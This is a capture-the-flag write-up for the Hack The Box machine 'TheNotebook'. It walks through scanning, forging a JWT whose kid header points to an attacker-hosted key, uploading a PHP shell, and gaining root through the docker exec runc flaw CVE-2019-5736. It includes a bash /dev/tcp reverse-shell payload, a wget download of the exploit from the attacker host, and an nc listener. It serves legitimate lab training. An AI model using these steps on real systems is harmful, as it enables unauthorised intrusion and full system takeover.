Welcome to the TheNotebook writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
TheNotebook
tags: HTB Medium Linux
Platform: Hackthebox
Difficult: Medium
S.O.: Linux
Link: Click here
Enumeration
Nmap
We run a scan of all ports to see which ones are open.
# nmap -p- -T4 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:29 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.034s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10010/tcp filtered rxapi
Nmap done: 1 IP address (1 host up) scanned in 15.99 secondsNow that we know which ports are open, we are going to analyze them in depth.
# nmap -A -Pn -p 22,80,10010 thenotebook.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-06 22:30 CET
Nmap scan report for thenotebook.htb (10.129.93.6)
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.22
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 105.30 ms 10.10.14.1
2 105.53 ms thenotebook.htb (10.129.93.6)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.61 secondsGoBuster
For the directory enumeration of the web server on port 80, we are going to use gobuster
# gobuster dir -u http://thenotebook.htb/ -w /usr/share/wordlists/dirb/big.txt -t 200 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://thenotebook.htb/
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/06 22:36:28 Starting gobuster
===============================================================
/admin (Status: 403)
/login (Status: 200)
/logout (Status: 302)
/register (Status: 200)
===============================================================
2021/03/06 22:36:50 Finished
===============================================================Cookies
On the web page, once we are registered and logged in, we can see that a cookie called auth is created in base64
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Ing0djFsMGsiLCJlbWFpbCI6ImFAYi5jIiwiYWRtaW5fY2FwIjpmYWxzZX0.Hw1TQj4s9fjDUl_iLGaSu0Rk5dhHJUuJ3ITbxlC-jEtLUrPqUmG4b9SfIdwp_kVq6bo4joE_Lr0aoea_T5UIL1rC9S3lditiH-xdrAnWIoTFMMNLZ9_134QgN_VRu98hs9Tm4EBgwkz6EHN9_Ps8WdRy9_VdguRSOLxfvwEDRnhIXzydNmTxii0RBqR-5voTKTmiUO-gjdZ_T1fSYVSHuyvO4o0mL_8ETuoW9KkYAZhXHdzIdj-DjPAtOAuFYqY4m_xZdsf4DGobHQzOxbMWvjJeXXE3v7DTBgMYFT7_gUTtGqIgOQQeHaO9Hfzmf45VzG0yX9q19ezqiGAlbyoSzJpRvHEyeL8ShK5XAUcl_UhbC7GMjaFbwOKA5BTxV0MVNP7SgIPS2i9DypwsQ_xU68enVmWVAoWZeLLFje18x84QoUK8U02wYWRYYs7gBEV2r9DA7uZwRinMQn66sRqG-qTF0KKRWlcshpctWzCNjkIPSl63wmvyOnvVi_MjdCo-YA7hdpuP80pMEIu_Ry6TK1cZ64Ed1GHnxrBDcoKPDKBUEZvgRHU7bloGLbWDbVoYP0LQv1X5r0W-BLbdHyyn3h54OFxHMCYkJ6V4FDurrdVKezk4QqUL_M7HT5OK_R3266lWtuDa_hc2PzqSsgcy7QgzUbEHKYg_Wsb723iYEfsWhen we decode it, we can identify 3 important parameters JWT that indicates the type of cookie, kid that configures the URL where the key will be searched to validate the authenticity of the cookie and admin_cap that indicates if we are an administrator or a normal user.
{"typ":"JWT","alg":"RS256","kid":"http://localhost:7070/privKey.key"}{"username":"x4v1l0k","email":"a@b.c","admin_cap":false}.ÃTÐ..=~0Ô."Æi+´FN].rT¸.ÈM¼e
1--JÏ©I.á¿R|.p¦Ejéº8...¯F¨y¤ùP.õ¬/RÞWb¶!ñv°'X...Ã
-.uß. 5Tn÷Èlõ9¸..0.>..ßO³Å.G/Uv..Hâñ~ü.
.á!|òtÙ.Æ(´D..æú.)9¢Pè#u.õ}&.H{²¼î(Òbü.;¨[Ò¤`.a\ws!ØÃ.ð-8..b¦8..]±þ...ÇC3±lů...\Mïì4Á.Æ.O¸.NѪ"..AáÚ;ÑßÎgøå\ÆÓ%ý«_^Ψ..Vò¡,É¥.Ç.'.ñ(Jåp.rU!l.Æ26.o....SÅ].TÓûJ..Kh½.*p±.TëǧVe....x²Å.í|ÇÎ.¡B¼SM°adXbÎà.Ev¯ÐÀîæpF)ÌB~º±..©1t(¤V.Ë!¥ËVÌ#c..Ò..ð.ü..õb27B¡.;.Ún?Í)0B.G..+W.ë..ÔaçÆ°Cr... T..àDu;nZ.-µ.mZ.?BпUù¯E.-·GË)÷.....Ì . é^..êëuR.ÎN.©BÌìtù8¤wÛ®¥ZÛ.j.6?:.².2í.3Q±.)..±¾öÞ&.~Knowing this, we can create our own RSA key to sign the token and modify the cookie to become an administrator.
Exploitation
RSA key creation:
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ ssh-keygen -t rsa -b 1024 -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in privKey.key.pub
The key fingerprint is:
SHA256:U6nCQGxyuXQzI8mMPU8bV8JQmHD4nhFE9TUFJ/7vE7k kali@kali
The key's randomart image is:
+---[RSA 1024]----+
| *oB=B+.. =oo |
| o.#.@ oo + + |
| =.O O + . |
| .o= o . |
| .ooS . .|
| o. . + |
| +|
| E |
| o|
+----[SHA256]-----+ kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/TheNotebook$ cat privKey.key
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQD043XKd62njtc5tly9C1RUZjf9Pqb+7q7xdCxSqFk8a5PgcOyL
pKYOWMKI5hzrd2VBtZVLH/79FB6OgA/lRsxFBXrDaB/EtYfcRhdAY+uNBni9UqQC
OLzDSvhx18EqOQke7BWxitRcKy2IdrviCeI/tiMBgHbZENM1MqIjAKqGdQIDAQAB
AoGAc9MlgjaqrsaTq1tCb7NtFmImdyPr7kXL/q24zPuNAVPMZGpkpwOf+scmc4OL
CB+3h6Wv0BF5FBAxB6swWXvr3oiINJHQhm8QpjUJ61/YsZ/fqCWsJr9HmFfUrajj
CCLl8wdGZQCpXhtsIIlW6rrDyIofLBx4ygTai5BwQ8bVlkECQQD6vUCvcayrghxA
QJKIJRAfe0alh8qQRPnmVqIU3yowG4drdJvPzSypS/xKq0upHH0jH/sCj0IsmbPo
BUQJXoVlAkEA+gbITVr3ZS7ggesw1FmdnGkEwkzNBB0bhAYaaJEBWT6tjUDoetQw
YnAHoUmQkx1CnLoD3DSGYo5JfqUgx7Kz0QJAQAPpa+F90Bvb0pupzZCI2UDD/Kb6
lHLHyoL7xpBjWPzuSgTvctJTQLXhp76sBnT7jegwUar5niFvySDvCeVT8QJBANw1
RwtieAxk+hVTCMGuYDOXBzr+G39pB4gDPBUmyZJJst968IbmBetdEktKmIwJtFaH
Oskidc2t1is10qYvzVECQER3qnQoryNfEoaTa0aXCCDagvEljMHNvKURJjZdtImn
XEVxRZGddV7WSdmjzmuzGGbcRFl7y7EbPz/aTuUoE3Q=
-----END RSA PRIVATE KEY-----Creation of the signed cookie:
HEADER
{
"alg": "RS256",
"typ": "JWT",
"kid":"http://10.10.14.164/privKey.key"
}PAYLOAD
{"username":"x4v1l0k","email":"as@b.c","admin_cap":true}VERIFY SIGNATURE
In the verify signature section, we add the RSA private key content that ssh-keygen generated for us before.
We copy the text that appears in the "Encoded" section.
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNS4yNjo3MDcwL3ByaXZLZXkua2V5In0.eyJ1c2VybmFtZSI6ImFkbWluICAgICAgICIsImVtYWlsIjoiYXNAYi5jIiwiYWRtaW5fY2FwIjoxfQ.cI6EeCp4zrIJbQIzofpmnbYThOF2Q6WVesnk14NZrc1pMJw3CaxtdsrB5LOXKqjl-s6ZHufc10q35XLdvWV1148asDssVlGJ0XEyA9E8W2K5C4d4sXXP9NHoxkWLGZGmCdr--4NvnAHXyRmFnQRcNurdh1LoztRAqIVc-rVRu8wAnd now it only remains to modify the cookie "auth" with the previous text and turn on the web server where the key is stored.
python -m SimpleHTTPServer 80And we can now access http://10.129.93.4/admin
Now, entering Upload File we find a form to upload a file.
Let's upload a shell.php
Perfect, we put a terminal to listen, click on View and we will have our shell!
Post exploitation
Enumeration
By listing the system files, we can find the file home.tar.gz inside/var/backups.
When we extract it, we find a copy of the noah's home directory and inside it, hisid_rsa to connect by SSH.
www-data@thenotebook:/var/backups$ mkdir /tmp/.htbuser
www-data@thenotebook:/var/backups$ tar -xvf home.tar.gz -C /tmp/.htbuser
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub
www-data@thenotebook:/var/backups$Privilege scalation
Sudo
noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*We are going to see the version of Docker that is installed and if there are any exploits available.
noah@thenotebook:~$ docker version
Client:
Version: 18.06.0-ce
API version: 1.38
Go version: go1.10.3
Git commit: 0ffa825
Built: Wed Jul 18 19:09:54 2018
OS/Arch: linux/amd64
Experimental: falseLooking for vulnerabilities for docker exec 18.06 we can find that there is one for all versions prior to18.09.2 as we can see in the CVE web page
Based on the exploit of this link we can exploit the CVE-2019-5736 that exploits the vulnerability in docker exec.
To exploit it, we are going to download the main.go file and edit the payload line to replace it with the following:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.164/8787 0>&1"Once we have saved it, we compile the file with go build main.go and a file called main will be generated which will be our exploit.
Now we just have to connect to the docker
sudo /usr/bin/docker exec -it webapp-dev01 bashand load the exploit using wget.
# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...root@c61bf421b6e4:~# wget 10.10.14.164/main
--2021-03-07 02:45:21-- http://10.10.14.164/main
Connecting to 10.10.14.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2270002 (2.2M) [application/octet-stream]
Saving to: ‘main’
main 100%[=========================================================================================================================================>] 2.16M 872KB/s in 2.5s
2021-03-07 02:45:24 (872 KB/s) - ‘main’ saved [2270002/2270002]Now, we only have to put a terminal to listen and execute the exploit and when it tells us [+] Overwritten/bin/sh successfullysudo /usr/bin/docker exec -it webapp-dev01 bash sudo/usr/bin/docker exec -it webapp-dev01 bash.
When making the second connection, we can see that the exploit shows the following lines indicating that it has concluded.
[+] Found the PID: 54
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc000350060}And as we can see, in the terminal that we had listening, we now have a shell as root!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.164] from (UNKNOWN) [10.129.93.75] 42444
bash: cannot set terminal process group (47472): Inappropriate ioctl for device
bash: no job control in this shell
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# id
id
uid=0(root) gid=0(root) groups=0(root)
<1a0e529e35be5d23f999e279b3956f18bb85e6cf8e2b6bd9c# hostname
hostname
thenotebookCan you help me share it?
